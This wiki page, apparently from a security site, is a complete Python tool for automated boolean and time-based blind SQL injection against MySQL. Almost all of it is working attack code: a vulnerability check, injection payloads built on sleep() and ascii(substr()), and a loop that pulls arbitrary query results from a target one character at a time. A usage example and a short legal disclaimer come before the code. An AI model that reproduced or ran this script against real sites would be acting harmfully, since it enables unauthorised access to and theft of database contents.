Questions about this topic? Sign up to ask in the talk tab.

SQL injection/mysqli-blindutils/sqli-slee.py

From NetSec
Revision as of 16:51, 22 September 2012 by Dilon (Talk | contribs) (Source)

Jump to: navigation, search
c3el4.png
This script uses time and boolean based blind SQL injection to obtain the desired information from MySQL database.

Info

The syntax of this script is:

 python bsqli.py -u [url] -i [injection]

Example

 python bsqli.py -u "http://target.com/?id=1%27" -i "select database()"

Disclaimer

RPU0j.png The end-user is liable for his-or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act.

Source

 
#!/usr/bin/python2.7
 
import sys,re,urllib2,string,time
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError
 
def request(URL):
    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
    req = urllib2.Request(URL, None, user_agent)
 
    try:
        request = urllib2.urlopen(req)
 
    except HTTPError, e:
        print('[!] The server couldnt fulfill the request.')
        print('[!] Error code: ' + str(e.code))
        sys.exit(1)
 
    except URLError, e:
        print('[!] We failed to reach a server.')
        print('[!] Reason: ' + str(e.reason))
        sys.exit(1)
 
    return len(request.read())
 
def value(URL):
    target = 0
    end = 0
    next_maybe = 0
    floor = 0
    ceiling = 255
    maybe = int(ceiling)/2
 
    while(end != 9):
        if(is_what(URL, maybe, '>')):	
            floor = maybe
            next_maybe = int(maybe + ((ceiling - floor)/2))
 
        elif(is_what(URL, maybe, '<')):
            ceiling = maybe
            next_maybe = int(maybe - ((ceiling - floor)/2))
 
        elif(is_what(URL, maybe, '=')):
            return chr(maybe)
 
        maybe = next_maybe
        end += 1
 
    return 'done'
 
def is_what(URL, maybe, op):
    if(sqli_type == 'boolean'):
        ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+'))
        if(TrueResponse == ValueResponse):
            return 1
        else:
            return 0
    elif(sqli_type == 'time'):
        start = time.time()
        ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+')
        elapsed_time = (time.time() - start)
        if (elapsed_time > 2):
            return 1
        else:
            return 0
 
def vuln_check(URL):
    print('[+] Checking site...')
 
    global TrueResponse
    TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
    FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
 
    if(TrueResponse != FalseResponse):
        print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
        return 'boolean'
    else:
        start = time.time()
        SleepResponse = request(URL + '%20and%20sleep(5)--+')
        elapsed_time = (time.time() - start)
 
        if(elapsed_time > 5):
            print('[+] Site seems to be vulnerable to time based blind SQL injection.') 
            return 'time'
        else:
            print('[!] Seems like site isnt vulnerable to blind SQL injection.')
            sys.exit(1)
 
def main():
    print('''
                Auto BSQLi tool for MySQL
                ''')
 
    usage = 'usage: %prog -u <target> -i <injection>'
    parser = OptionParser(usage=usage)
    parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
    parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
 
    (options, args) = parser.parse_args()
    if(options.URL and options.INJECTION):
        URL = options.URL
        INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))
    else:
        print('[!] Missing url or injection parameter.')
        print('[!] Use --help.')
        sys.exit(1)
 
    global sqli_type
    sqli_type = vuln_check(URL)
    position = 1
    dump = ''
    print('[+] Dumping data...')
 
    while(1):
        if(sqli_type == 'boolean'):
            letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
        elif(sqli_type == 'time'):
            letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
 
        if(letter == 'done'):
            break
 
        dump = dump + letter
        position += 1
 
    if(dump):
        print('[+] Data: ' + dump)
    else:
        print('[!] No data dumped. Check your injection.')
 
if __name__ == "__main__":
    main()